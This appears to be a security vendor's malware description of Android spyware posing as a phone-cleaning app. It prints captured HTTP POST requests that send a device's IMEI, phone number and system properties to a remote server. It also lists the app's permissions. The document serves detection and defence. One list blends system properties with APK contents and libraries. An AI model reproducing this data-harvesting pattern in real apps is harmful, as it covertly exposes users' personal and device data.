Android/Odpa.A!tr.spy
Analysis
Android/Odpa.A!tr.spy is a malware which targets Android mobile devices, and sends
multiple detailed information to a remote server.
Technical Details
The malware comes packaged as cn.com.opda.android.clearmaster, which is an application to clean up your smartphone (remove cache, history, batch removal of applications etc).
However, at startup, the sample sends multiple information to a remote server via HTTP POST:
POST /app/update HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip,deflate Charset: utf-8 Content-Type: multipart/form-data; boundary=---------7d4a6d158c9 User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; sdk Build/KK) Host: [CENSORED]kx.net Content-Length: 873 -----------7d4a6d158c9 Content-Disposition: form-data; name="json" {"device":{"info":{"model":"sdk","vendor":"unknown", "product_name":"","secure":1,"bootloader":"unknown", "kernel":"3.4.0-gd853d22\nnnk@nnk )","board":"", "tel_number":"15555215554","cid":"","build_product":"generic", "version":"","baseband":"unknown","model_internal":"", "description":"sdk-eng 4.4.2 KK 938007 test-keys","sim_operator":"XXXYZ," ,"product_brand":"generic","product_board":"","build_id":"KK", "keyboards_devname":"","sdk":"19","device_width":768,"device_height":1184, "product_device":"generic","release":"4.4. 2","identifier":""}},"wifimac":"","configversion":1000, "locale":"en","imei":"000000000000000"}In another post, it posts the content of numerous system properties to the remote server:
POST /device/model_miss HTTP/1.1 ... {"device":{"prop":{"ro.product.manufacturer":"unknown" ,"ro.product.brand":"generic","ro.carrier":"" ,"ro.product.model":"sdk",The system properties which are sent are:
- ro.baseband
- ro.board.platform
- ro.bootloader
- ro.build.id
- ro.build.version.sdk
- ro.build.version.release
- ro.build.description
- ro.build.product
- ro.carrier
- ro.chipname
- ro.cid
- ro.hardware
- ro.htc.common.version
- ro.modversion
- ro.model.internal
- ro.product.version
- ro.product.board
- ro.product.device
- ro.product.name
- ro.product.manufacturer
- ro.product.brand
- ro.product.model
- ro.serialno
- ro.semc.product.name
- gsm.sim.operator.numeric.2
- hw.keyboards.0.devname
- phone number
- IMEI
- MAC address
- indication whether the device is rooted or not ("secure")
- carrier name
- ./META-INF/CERT.RSA
- ./META-INF/MANIFEST.MF
- ./META-INF/CERT.SF
- ./AndroidManifest.xml
- ./resources.arsc
- ./classes.dex
- several resources
- ./assets/filepath.db: a database of application package names with their paths
- ./assets/RemoteTools.jar
- Google Ads
- Android Support v4
- Umeng
The malware asks for the following permissions:
- READ_CONTACTS
- ACCESS_WIFI_STATE
- READ_LOGS
- INTERNET
- VIBRATE: this is used to trigger cleaning the smartphone.
- READ_HISTORY_BOOKMARKS
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
FortiGate | |
---|---|
Extreme | |
FortiClient | |
Extended | |
FortiMail | |
Extended | |
FortiSandbox | |
Extended | |
FortiWeb | |
Extended | |
Web Application Firewall | |
Extended | |
FortiIsolator | |
Extended | |
FortiDeceptor | |
Extended | |
FortiEDR |